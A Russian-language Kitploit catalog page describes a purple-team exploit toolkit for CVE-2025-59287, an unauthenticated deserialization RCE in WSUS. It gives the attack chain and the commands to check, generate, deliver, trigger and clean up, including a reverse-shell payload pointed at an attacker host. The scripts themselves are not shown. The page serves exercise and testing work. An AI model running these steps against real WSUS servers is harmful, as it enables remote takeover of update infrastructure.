Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-59287-Exercise-Use — Сценарии упражнений для фиолетовой команды, демонстрирующие CVE-2025-59287 — неаутентифицированное RCE в WSUS через внедрение вредоносной полезной нагрузки десериализации в базу данных WSUS. | Kitploit
Инструменты/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной НагрузкиЛаборатории и Практика
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

Сценарии упражнений для фиолетовой команды, демонстрирующие CVE-2025-59287 — неаутентифицированное RCE в WSUS через внедрение вредоносной полезной нагрузки десериализации в базу данных WSUS.

Репозиторий
26 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-59287 — WSUS Неаутентифицированное удаленное выполнение кода

Скрипты для фиолетовой команды (purple team) для CVE-2025-59287 — уязвимости неаутентифицированного удаленного выполнения кода в службах Windows Server Update Services (WSUS).

Только санкционированное использование. Для применения в контролируемых учебных средах против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.

Как это работает

Уязвимость злоупотребляет анонимно доступными SOAP-конечными точками WSUS для внедрения вредоносной полезной нагрузки десериализации в базу данных WSUS. Полезная нагрузка выполняется при открытии консоли администрирования WSUS или при запуске синхронизации.

  1. Служба аутентификации WSUS выдает действительный токен любому анонимному клиенту
  2. Токен обменивается на cookie сессии отчетности через веб-службу клиента
  3. Вредоносный сериализованный объект внедряется в базу данных WSUS через службу отчетности
  4. Полезная нагрузка выполняется при загрузке консоли WSUS или при срабатывании события синхронизации

Требования

  • Атакующая Windows-машина с PowerShell 5.1+
  • Сетевой доступ к WSUS на порту 8530
  • ysoserial.net размещен в папке ysoserial\Release\ (см. Настройка)

Структура репозитория

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # Проверить, уязвима ли цель
├── 2-generate.ps1    # Сгенерировать сериализованный блок полезной нагрузки
├── 3-deliver.ps1     # Доставить полезную нагрузку на сервер WSUS
├── 4-verify.ps1      # Проверить выполнение и очистить
├── ysoserial/        # Поместите сюда релиз ysoserial.net (не включен в репозиторий)
│   └── Release/
│       └── ysoserial.exe
└── README.md

Настройка

Клонируйте или скачайте репозиторий. Добавьте ysoserial.net так, чтобы путь соответствовал ysoserial\Release\ysoserial.exe.

Скачайте ysoserial.net с: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 По умолчанию это вызовет срабатывание Windows Defender

Использование

Запускайте все скрипты из корня репозитория.

1 — Проверка

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — Генерация

Сброс файла (прослушиватель не требуется, рекомендуется сначала):

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

Обратная оболочка:

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — Доставка

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — Запуск

На сервере WSUS откройте консоль администрирования через Пуск > Windows Server Update Services, или запустите синхронизацию через PowerShell:

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — Проверка и очистка

Проверка выполнения:

root@kitploit:~
.\4-verify.ps1

Проверка и удаление всех артефактов:

root@kitploit:~
.\4-verify.ps1 -Cleanup

С атакующей машины через административную папку:

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

После очистки удалите учебный компьютер из консоли WSUS в разделе Компьютеры.

Возможности обнаружения

Ссылки

  • CVE-2025-59287 — Оригинальное исследование: hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
Скачать инструмент